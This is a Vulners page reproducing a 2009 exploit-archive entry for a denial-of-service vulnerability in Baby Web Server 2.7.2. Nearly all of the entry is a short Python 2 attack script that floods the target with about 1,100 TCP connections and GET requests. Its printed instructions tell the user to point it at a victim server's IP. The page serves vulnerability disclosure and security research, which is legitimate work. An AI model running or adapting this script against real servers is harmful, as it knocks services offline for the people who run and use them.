Lucene search
K

Baby Web Server 2.7.2 Vulnerbility found Denial of Service(0day)

🗓️ 18 Nov 2009 00:00:00Reported by Asheesh KumarType 
zdt
 zdt
🔗 0day.today👁 16 Views

Baby Web Server 2.7.2 Vulnerability, Denial of Service(0day), Python script for DOS attac

Code
================================================================
Baby Web Server 2.7.2 Vulnerbility found Denial of Service(0day)
================================================================

# Title: Baby Web Server 2.7.2 Vulnerbility found Denial of Service(0day)
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Asheesh Kumar Mani Tripathi
# Published: 2009-11-18
# Verified: yes

view source
print?
#!/usr/bin/env python
#Author:Asheesh Kumar Mani Tripathi
#Created:Asheesh Kumar Mani Tripathi
import socket
 
print "****************************************************"
print "Baby Web Server 2.7.2 Vulnerbility found Denial of Service"
print "Change IP to Victim Server s.connect((127.0.0.1,80))"
print "Author: Asheesh Kumar Mani Tripathi"
print "Reason for DOS attack The Problem lies server"
print "unable to handle so much of  requests "
print "*****************************************************"
 
host = "127.0.0.1"
port = 80
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   conn = s.connect(("127.0.0.1",80))
   for i in range (1,1100):
       request =  "GET /some.txt HTTP/1.1 \n\n"
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       print i
except:
   print "Oh! Some Problem Occured Check Server is Running or Not"



#  0day.today [2018-04-12]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Nov 2009 00:00Current
7High risk
Vulners AI Score7
16